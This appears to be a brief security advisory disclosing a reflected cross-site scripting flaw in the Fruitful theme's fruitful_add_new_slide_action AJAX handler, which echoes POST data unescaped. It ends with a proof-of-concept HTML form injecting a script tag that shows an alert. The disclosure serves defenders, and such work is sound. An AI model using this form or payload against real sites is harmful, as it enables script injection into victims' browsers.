Fruitful [Reflected XSS]


Theme Fruitful is vulnerable to Reflected XSS attack by using the AJAX action fruitful_add_new_slide_action. This action outputs the contents of variable $_POST['data'] without proper escaping, thus allowing to an attacker to form a malicious request and execute JS code in the victims browser.

Because this action is a privileged one, it takes a registered and loged user to work.


Use a logged in user to submit this form

<form action="" method="post">
    <input type="hidden" name="action" value="fruitful_add_new_slide_action">
    <input type="hidden" name="data" value='"><script>alert(1)</script> <!--'>
    <input type="submit" value="Click Me!">